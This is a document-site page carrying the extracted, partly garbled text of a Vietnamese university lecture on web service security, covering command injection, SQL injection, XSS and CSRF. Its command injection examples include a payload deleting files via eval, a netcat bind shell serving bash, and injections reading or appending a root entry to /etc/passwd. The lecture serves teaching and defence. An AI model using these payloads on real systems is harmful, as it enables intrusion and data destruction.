tailieunhanh - Bài giảng An ninh mạng - Bài 9: An toàn dịch vụ web - SQL injection, XSS, CSRF

Bài giảng An ninh mạng - Bài 9: An toàn dịch vụ web - SQL injection, XSS, CSRF. Bài này cung cấp cho sinh viên những nội dung gồm: tổng quan về hoạt động của dịch vụ Web; tấn công dạng Command Injection; SQL Injection; XSS; CSRF; quản lý phiên; . Mời các bạn cùng tham khảo! | BÀI 9. AN TOÀN DỊCH VỤ WEB SQL INJECTION XSS CSRF Bùi Trọng Tùng Viện Công nghệ thông tin và Truyền thông Đại học Bách khoa Hà Nội 1 Nội dung Tổng quan về hoạt động của dịch vụ Web Tấn công dạng Command Injection SQL Injection XSS CSRF Quản lý phiên 2 1 1. TẤN CÔNG DẠNG COMMAND INJECTION Bùi Trọng Tùng Viện Công nghệ thông tin và Truyền thông Đại học Bách khoa Hà Nội 3 Command Injection Lợi dụng lỗ hổng không kiểm soát giá trị các đối số khi thực thi kịch bản servlet trên web server Không phân biệt được dữ liệu và mã nguồn trong đối số Ví dụ Website chứa servlet cung cấp tính năng tính toán biểu thức bất kỳ qua hàm eval http in _GET exp Nội dung biểu thức được truyền eval ans . in . qua đối số exp. Ví dụ http exp 1 1 Servlet thực thi như thế nào nếu truyền đối số như sau http exp 10 system rm . 4 2 Command Injection Ví dụ khác 1. http exec Client Server 2. Send page Ping for FREE Enter an IP address below Ô nhập dữ liệu 6 3 Command Injection Ví dụ khác Client Server 2. Send page t _REQUEST ip o shell_exec ping C 3 . t echo o PHP exec program 7 Command Injection Ví dụ khác ls Client Server 2. Send page t _REQUEST ip o shell_exec ping C 3 . t echo o PHP exec program 8 4 Command Injection Ví dụ khác Thực thi shell ip 26 netcat -v - e bin bash -l -p 31337 amp submit submit netcat v e bin bash l p 31337 9 Command Injection Ví dụ khác Mã PHP để gửi email email _POST email subject _POST subject system mail email s subject lt tmp joinmynetwork Chèn mã thực thi khi truyền giá trị cho đối số http email hacker@ amp subject foo lt usr passwd ls Hoặc http email hacker@ amp subject foo echo evil 0 0 root bin sh quot gt gt etc passwd ls 10 5 Phòng chống Kiểm tra chỉ chấp nhận giá trị chứa các ký tự hợp lệ Ký tự nào là hợp lệ Phụ thuộc ngữ cảnh Làm sạch đầu vào input sanitization Xác định các ký tự đặc biệt không nên xuất .

Không thể tạo bản xem trước, hãy bấm tải xuống
Tải xuống
TÀI LIỆU LIÊN QUAN

Bài giảng An ninh mạng máy tính - Chương 8: Các giao thức an ninh thông dụng (ThS. Lương Minh Huấn)
57    115    5

Bài giảng An ninh mạng máy tính - Chương 1: Tổng quan về an ninh mạng máy tính (ThS. Lương Minh Huấn)
126    127    7

Đề cương bài giảng học phần An ninh mạng
6    203    3

Bài giảng An ninh mạng – Chương 1: Giới thiệu (TS Nguyễn Đại Thọ)
18    158    3

Bài giảng An ninh mạng: Chương 1 - ThS. Trần Bá Nhiệm
22    168    4

Đề cương chi tiết bài giảng An ninh mạng
6    93    4

Bài giảng An ninh mạng máy tính - Chương 7: An ninh tầng giao vận (ThS. Lương Minh Huấn)
45    102    4

Bài giảng An ninh mạng - Chương 5: Bảo đảm an toàn mạng
52    120    2

Bài giảng An toàn bảo mật mạng: Chương 1 - ThS. Trần Đắc Tốt
96    213    7

Bài giảng An toàn và an ninh mạng – Bùi Trọng Tùng
33    311    18
TÀI LIỆU XEM NHIỀU

Một Case Về Hematology (1)

8    462335    61

Giới thiệu :Lập trình mã nguồn mở
14    25879    79

Tiểu luận: Tư tưởng Hồ Chí Minh về xây dựng nhà nước trong sạch vững mạnh
13    11333    542

Câu hỏi và đáp án bài tập tình huống Quản trị học
14    10541    466

Phân tích và làm rõ ý kiến sau: “Bài thơ Tự tình II vừa nói lên bi kịch duyên phận vừa cho thấy khát vọng sống, khát vọng hạnh phúc của Hồ Xuân Hương”
3    9832    108

Ebook Facts and Figures – Basic reading practice: Phần 1 – Đặng Tuấn Anh (Dịch)
249    8884    1161

Tiểu luận: Nội dung tư tưởng Hồ Chí Minh về đạo đức
16    8497    426

Mẫu đơn thông tin ứng viên ngân hàng VIB
8    8098    2279

Giáo trình Tư tưởng Hồ Chí Minh - Mạch Quang Thắng (Dành cho bậc ĐH - Không chuyên ngành Lý luận chính trị)
152    7691    1786

Đề tài: Dự án kinh doanh thời trang quần áo nữ
17    7237    268
TỪ KHÓA LIÊN QUAN
TÀI LIỆU MỚI ĐĂNG

Giáo án mầm non chương trình đổi mới: Gia đình vui nhộn
4    390    3    22-12-2024

báo cáo hóa học:" Perceptions of rewards among volunteer caregivers of people living with AIDS working in faith-based organizations in South Africa: a qualitative study"
10    155    1    22-12-2024

BÀI GIẢNG Biến Đổi Năng Lượng Điện Cơ - TS. Hồ Phạm Huy

137    154    1    22-12-2024

báo cáo hóa học:" Quality of data collection in a large HIV observational clinic database in sub-Saharan Africa: implications for clinical research and audit of care"
7    151    4    22-12-2024

ETHICAL CODE HANDBOOK: Demonstrate your commitment to high standards
7    146    1    22-12-2024

Báo cáo nghiên cứu khoa học " Đại hội XVI thông qua điều lệ Đảng cộng sản Trung Quốc những sửa đổi bổ sung mới "
4    160    1    22-12-2024

Báo cáo lâm nghiệp: "Assessment of the effects of below-zero temperatures on photosynthesis and chlorophyll a fluorescence in leaf discs of Eucalyptus globulu"
4    137    0    22-12-2024

CÔNG NGHỆ MÔI TRƯỜNG - CHƯƠNG 5 CƠ SỞ QUÁ TRÌNH XỬ LÝ SINH HỌC

1    140    0    22-12-2024

NHÀ MẠC – NAM BẮC TRIỀU (1527-1592)_1
6    121    1    22-12-2024

NGUỒN GỐC CÂY KHOAI LANG
3    124    1    22-12-2024
TÀI LIỆU HOT

Mẫu đơn thông tin ứng viên ngân hàng VIB
8    8098    2279

Giáo trình Tư tưởng Hồ Chí Minh - Mạch Quang Thắng (Dành cho bậc ĐH - Không chuyên ngành Lý luận chính trị)
152    7691    1786

Ebook Chào con ba mẹ đã sẵn sàng
112    4404    1371

Ebook Tuyển tập đề bài và bài văn nghị luận xã hội: Phần 1
62    6267    1266

Ebook Facts and Figures – Basic reading practice: Phần 1 – Đặng Tuấn Anh (Dịch)
249    8884    1161

Giáo trình Văn hóa kinh doanh - PGS.TS. Dương Thị Liễu
561    3833    680

Giáo trình Sinh lí học trẻ em: Phần 1 - TS Lê Thanh Vân
122    3917    609

Giáo trình Pháp luật đại cương: Phần 1 - NXB ĐH Sư Phạm
274    4695    565

Tiểu luận: Tư tưởng Hồ Chí Minh về xây dựng nhà nước trong sạch vững mạnh
13    11333    542

Bài tập nhóm quản lý dự án: Dự án xây dựng quán cafe
35    4497    490